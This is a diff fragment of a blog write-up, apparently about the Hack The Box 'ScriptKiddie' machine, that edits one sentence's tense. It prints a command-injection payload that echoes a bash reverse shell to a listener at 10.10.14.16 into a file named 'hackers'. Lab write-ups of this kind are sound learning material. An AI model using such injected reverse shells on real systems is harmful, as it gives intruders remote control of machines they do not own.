leonidstorms/leonidstorms.github.io/_posts/2021-6-5-ScriptKiddie.md

 ![Pasted image 20210604121933](https://user-images.githubusercontent.com/60187707/120905840-8489ba00-c61a-11eb-9f3a-5468e8dd6589.png)

-So, I'll start a listener and `echo` a reverse shell into `hackers`, with a `;` at the beginning to start a new command and a `#` at the end to comment out the rest of the script.
+So, I started a listener and used `echo` to place a reverse shell into `hackers`, with a `;` at the beginning to start a new command and a `#` at the end to comment out the rest of the script.

 `echo "  ; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/1234 0>&1' #" >> hackers`